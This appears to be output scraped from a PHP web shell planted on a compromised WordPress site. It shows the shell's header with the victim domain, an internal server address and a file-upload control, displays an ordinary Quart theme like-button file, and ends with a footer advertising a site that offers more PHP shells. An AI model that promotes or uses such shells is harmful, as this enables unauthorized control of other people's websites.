Domain: antoinekatan.com
Server Adress: 10.127.20.23

privdayz.com

/home/xdxuekl/www/wp-content/themes/quart/framework/modules/like/
Dosya Yükle :
Current File : /home/xdxuekl/www/wp-content/themes/quart/framework/modules/like/like-functions.php

<?php

if ( ! function_exists( 'quart_mikado_like' ) ) {
	/**
	 * Returns QuartMikadoClassLike instance
	 *
	 * @return QuartMikadoClassLike
	 */
	function quart_mikado_like() {
		return QuartMikadoClassLike::get_instance();
	}
}

function quart_mikado_get_like() {
	
	echo wp_kses( quart_mikado_like()->add_like(), array(
		'span' => array(
			'class'       => true,
			'aria-hidden' => true,
			'style'       => true,
			'id'          => true
		),
		'i'    => array(
			'class' => true,
			'style' => true,
			'id'    => true
		),
		'a'    => array(
			'href'  => true,
			'class' => true,
			'id'    => true,
			'title' => true,
			'style' => true
		)
	) );
}

coded by Privdayz.com - Visit https://privdayz.com/ for more php shells.